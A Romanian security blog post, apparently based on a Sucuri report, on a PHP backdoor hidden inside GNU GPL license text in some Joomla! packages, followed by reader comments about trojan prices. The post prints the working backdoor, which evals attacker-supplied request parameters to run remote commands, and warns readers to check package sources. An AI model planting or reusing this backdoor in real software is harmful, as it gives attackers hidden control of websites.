Am ajuns și aici: a fost descoperit primul backdoor deghizat într-o licență GNU, inofensivă, ușor de trecut cu vederea pentru un ochi mai puțin specializat. Câteva linii de cod PHP, inteligent plasate în contextul unei licențe GNU face posibilă infectarea rapidă a unui website al cărui posesor/administrator nu a fost în măsură să detecteze amenințarea. Mai ales că e un exemplu de cod periculos, prea puțin cunoscut și întâlnit (încă!).
Priviți textul de mai jos. Pentru câți se declanșează un semnal de alarmă, așa cum ar trebui când vedeți într-un fișier, teoretic o licență GNU, început de cod PHP?
< ?php
/* GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
..
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
*/Copyright3_6_56()/* 1989, 1991 Free Software Foundation, Inc. 675 Mass Ave, Cambridge, MA 02139, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software–to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation’s software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too.*/?>
Joomla! derives from copyrighted works licensed under the GNU General Public License. This version has been modified pursuant to the GNU General Public License as of September 15, 2005, and as distributed, it includes or is derivative of works licensed under the GNU General Public License or other free or open source software licenses. Please see the CREDITS.php for a non-exhaustive list of contributors and copyright holders. A full text version of the GNU GPL version 2 can be found in the LICENSE.php file. A full text version of the other licenses that Joomla! is derivative of or includes can be found in LICENSES.php.
<? php
Copyright3_6_56();
function Copyright3_6_56() {
static $gnu = true;
if(!$gnu) return;
if(!isset($_REQUEST[‘gnu’])||!isset($_REQUEST[‘c_id’]))return;
$gpl=implode(”, $_REQUEST[‘gnu’]);
eval ($gpl( $_REQUEST[‘c_id’]));
$gnu=false;
}
Abia spre final se poate vedea ceea ce face cu adevărat codul malware: așteptă ascuns comenzi remote pe care să le execute fără știrea administratorului. Bucata de cod de mai sus a apărut în câteva pachete Joomla!, un program open-source foarte răspândit pe web.
Noroc că a fost descoperit și s-a tras un semnal de alarmă pentru a verifica permanent proveniența pachetelor instalate pe site-uri web. Dacă nu vine de pe un mirror oficial, e mult mai bine să fie evitat ca să nu apară situații ca cele de mai sus.
Fiți atenți la ce instalați, e tot ceea ce pot spune.
via sucuri
@Bogdan
Daca troianul e de vanzare deja nu mai are valoare. Cele mai importante (si despre care se afla doar accidental) sunt acelea despre care nu se stie inca.
Un troian bun pentru Linux e ceva mai scump decat unul pentru Windows: 2000 dolari pentru Hand of Thief http://arstechnica.com/security/2013/08/hand-of-thief-banking-trojan-doesnt-do-windows-but-it-does-linux/
Hahaha! Daca nu pot instala malware prin vulnerabilitati ale sistemului de operare (nu ca la altele) mizeaza pe prostia utilizatorului.
Bun asa!